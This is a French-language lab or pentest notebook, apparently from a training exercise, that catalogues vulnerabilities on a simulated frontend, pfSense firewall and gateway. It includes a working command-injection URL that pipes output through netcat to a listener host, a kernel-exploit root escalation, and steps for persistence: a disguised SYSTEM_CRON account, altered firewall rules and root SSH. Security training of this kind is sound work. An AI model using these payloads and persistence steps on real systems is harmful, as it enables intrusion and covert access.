PF SENSE - HackMD

[TOC] ### Liste des Vulnérabilités #### Machine frontend : ##### Communication non chiffrés (HTTP) ![](https://i.imgur.com/GJabZbp.png) ##### Mauvaise configuration des répertoires ![](https://i.imgur.com/gY03cjQ.png) ##### XSS attack ![](https://i.imgur.com/noOCEXW.png) lorsque l'on clique sur preview : ![](https://cdn.discordapp.com/attachments/823950163961839689/826495525023907890/unknown.png) ##### Fabrication de cookie falsifié Cet exploit est basé sur une `hash length attack` et permet d'obtenir un cookie de session admin ##### Politique des mots de passe trop faible lors de la création de compte sur le site, les mots de passes à 1 caractère sont autorisés, ce n'est pas sérieux. #### Machine : pfSense ##### Command Injection Attaquer le pare-feu **pfSense** est possible depuis la *gateway* en ouvrant un `netcat` *listener* sur cette dernière, puis en accédant à l'URL suivant du pare-feu : `https://localhost/status_rrd_graph_img.php?database=queues;ls /tmp | nc 172.16.0.254 4448` ##### Politique des mots de passe trop faible Un compte possède comme identifiant user et comme mot de passe user, ##### Modification du mot de passe sans connaitre le précédent #### Machine : gateway ###### Test d'intrusion ##### CVE-2017-16995 user : admin L'outil `linux exploit suggester` nous donne une liste d'exploits potentiellement effectifs sur cette machine : ![image de la liste d'exploit]() Après en avoir testé plusieurs, Il s'avère qu'une variante pour les kernels 4.4.x de la **POC** de la CVE-2017-16995 fonctionne sur cette machine, en effet on obtient un accès root en éxécutant le binaire compilé au préalable sur notre machine attaquante: ![image du root uid sur la gateway]() Depuis l'adresse un terminal ouvert sur **GoldPharma** (`176.31.251.122`) il est possible de se connecter directement en `root` à la *gateway* (`172.16.0.254`) via ssh : ```bash www-data@frontend:~/html/uploads$ ssh -i /tmp/adSK admin@172.16.0.254 ``` ###### remédiation : # PF SENSE modification du fichier config.xml pour modifier le mot de passe de l'admin, ![image du passage dans le fichier xml]() connexion à pfsense avec les nouveaux credentials et ajout d'un user, SYSTEM_CRON, via l'onglet `user manager` ![image pfsense user manager]() Afin de pouvoir accéder au 2ème sous-réseaux, 1 ère façon on ajoute une règle spécifique au webServer Goldpharma, ![rule pfsense]() 2ème façon On obtient un shell avancé sur la machine pfsense activation du secure shell ajout d'une règle dans le parfeu autorisant les connexions depuis la gateway vers le port 22 on se connecte avec le user SYSTEM_CRON Dans le but d'avoir un shell root stable pour faire un tunnel, on crée une paire de clé pour avoir un accès en ssh -- piste abandonnée On s'aperçoit que modifier le mot de passe admin depuis le manager pfsense modifie le mot de passe root, on peut se connecter à la session root en ssh avec un mot de passe que l'on aura prédéfini